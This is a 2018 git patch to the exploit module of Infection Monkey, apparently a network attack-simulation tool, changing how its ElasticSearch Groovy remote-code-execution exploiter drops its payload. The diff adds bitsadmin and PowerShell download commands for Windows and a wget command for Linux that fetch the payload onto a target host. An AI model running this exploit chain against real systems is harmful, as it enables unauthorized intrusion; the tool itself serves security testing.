From a54eedec113d914a458fc675e61052770dd8e5bf Mon Sep 17 00:00:00 2001
From: Vakaris <vaoxygen@gmail.com>
Date: Tue, 24 Jul 2018 15:55:34 +0300
Subject: [PATCH] Commands tested and working on windows.

---
 infection_monkey/exploit/elasticgroovy.py | 25 +++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)

diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py
index 668a95ce3..51531957b 100644
--- a/infection_monkey/exploit/elasticgroovy.py
+++ b/infection_monkey/exploit/elasticgroovy.py
@@ -6,13 +6,14 @@
 
 import json
 import logging
-
 import requests
-
-from model import DROPPER_ARG
 from network.elasticfinger import ES_SERVICE, ES_PORT
 from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
 from exploit.web_rce import WebRCE
+from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
+
+import copy
+import re
 
 __author__ = 'danielg'
 
@@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):
 
     DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
 
+    # Both commands are prepared for use in future development
+    RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
+    POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
+
     _TARGET_OS_TYPE = ['linux', 'windows']
 
     def __init__(self, host):
@@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
         if not vulnerable_urls:
             return False
 
-        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
+        # Extra escaping required:
+        config = copy.deepcopy(self._config)
+        config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
+        config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
+
+        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
             LOG.info("Host %s was already infected under the current configuration, done" % self.host)
             return True
 
         if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
             return False
 
-        data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
+        commands = {'windows': self.RDP_CMDLINE_HTTP,
+                    'linux': WGET_HTTP_UPLOAD}
+
+        data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
 
         # We can't use 'if not' because response may be ''
         if data is not False and data['response'] == False:
@@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
         payload = self.JAVA_CMD % command
         response = requests.get(url, data=payload)
         result = self.get_results(response)
-        if not result:  # not vulnerable
+        if not result:
             return False
         return result[0]